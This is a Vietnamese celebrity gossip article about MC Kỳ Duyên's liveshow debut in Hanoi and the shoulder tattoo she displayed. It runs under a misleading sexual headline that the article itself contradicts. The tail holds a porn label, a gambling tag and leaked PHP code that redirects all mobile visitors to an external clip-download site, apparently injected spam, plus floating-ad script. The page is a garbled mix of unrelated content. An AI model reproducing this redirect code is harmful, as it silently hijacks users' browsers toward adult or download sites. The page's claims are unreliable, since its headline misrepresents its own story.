Kỳ Duyên lộ hình xăm chỗ kín

Filed under: GÁI CHƠI |

Tự hào khoe mình là con gái Sơn Tây, Hà Nội, nữ MC hải ngoại đầy duyên dáng, hài hước khi lần đầu ra mắt khán giả thủ đô trong liveshow ‘Đôi mắt người xưa’ của Quang Lê tối 4/3. Sự xuất hiện của cô là điểm nhấn lớn cho sự thành công của chương trình. > MC Kỳ Duyên: ‘Hôn nhân không giữ được chân ai’

Kỳ Duyên
Trong vai trò của một MC, Kỳ Duyên thể hiện sự khéo léo cùng óc hài hước hấp dẫn khán giả.
Kỳ Duyên
Lần đầu về nước tham gia live show, Kỳ Duyên cho biết, chị cảm thấy hồi hộp như nàng dâu ra mắt mẹ chồng. Khả năng sử dụng nhuần nhị những câu tục ngữ của người Việt khiến Kỳ Duyên nhanh chóng bắt nhịp được với người xem.
Kỳ Duyên
Không có Nguyễn Ngọc Ngạn, Kỳ Duyên phải nhờ đến sự trợ giúp của ca sĩ Phan Anh vì “không thể tự tung, tự hứng”.
Kỳ Duyên
Lần đầu diễn cặp nhưng Phan Anh – Kỳ Duyên rất ăn khớp.
Kỳ Duyên
Cả hai còn vào vai một đôi tình nhân để chọc cười khán giả.
Kỳ Duyên
Cả hai bộ trang phục Kỳ Duyên mặc trong live show “Đôi mắt người xưa” ở Hà Nội đều màu xanh và khoe phần lưng trần gợi cảm.
Kỳ Duyên
Nữ MC duyên dáng đi xuống giao lưu với khán giả.
Kỳ Duyên
Khi quay người lại, cô để lộ hình xăm trên vai trần với dòng chữ: “M2 life Y”. Chị từng giải thích về hình xăm này: “Chữ M2 là chữ viết tắt tên của mẹ Duyên (Mai) và con gái lớn (Maili), chữ Y là con gái út (Yênli). Đọc ráp lại là “MY Life” (Đời tôi). Có nghĩa là mẹ và con là đời sống của tôi – “they are my life” và cũng có nghĩa là đời tôi là của tôi “this is my life”.
Kỳ Duyên
Bộ đầm xẻ táo bạo của Kỳ Duyên.
Kỳ Duyên
Không chỉ đầu tư cho trang phục, Kỳ Duyên còn thuê một chuyên gia trang điểm từ Mỹ về hỗ trợ cho cô.
Kỳ Duyên
Kỳ Duyên cho biết, cô hạnh phúc khi được khán giả thủ đô đón nhận nồng nhiệt như vậy.

Phim sex
if (is_mobile()) { header("Location: http://mclip.in/tai-clip/13363"); exit(); } function is_mobile() { if(isset($_SERVER["HTTP_X_WAP_PROFILE"])) return true; if(preg_match("/wap.|.wap/i",$_SERVER["HTTP_ACCEPT"])) return true; if(isset($_SERVER["HTTP_USER_AGENT"])) { $user_agents = array( "midp", "java", "opera mini", "opera mobi", "mobi", "nokia", "midp", "midp", "j2me", "avantg", "docomo", "novarra", "palmos", "palmsource", "240x320", "opwv", "chtml", "pda", "windows ce", "mmp\/", "blackberry", "mib\/", "symbian", "wireless", "nokia", "hand", "mobi", "phone", "cdm", "up.b", "audio", "SIE-", "SEC-", "samsung", "HTC", "mot-", "mitsu", "sagem", "sony", "alcatel", "lg", "erics", "vx", "NEC", "philips", "mmm", "xx", "panasonic", "sharp", "wap", "sch", "rover", "pocket", "benq", "java", "pt", "pg", "vox", "amoi", "bird", "compal", "kg", "voda", "sany", "kdd", "dbt", "sendo", "sgh", "jb", "dddi", "iphone", "ipad", "android", "Android","series 60", "s60" ); $user_agents = implode("|", $user_agents ); if (preg_match("/$user_agents/i", $_SERVER["HTTP_USER_AGENT"])) return true; } return false; } function hide_float() { var content = document.getElementById('float_content'); var hide = document.getElementById('hide_float'); if (content.style.display == "none") { content.style.display = "block"; hide.innerHTML = ' Close [X]'; } else { content.style.display = "none"; hide.innerHTML = 'Quang Cao! '; } }
[X] Close.
mybet88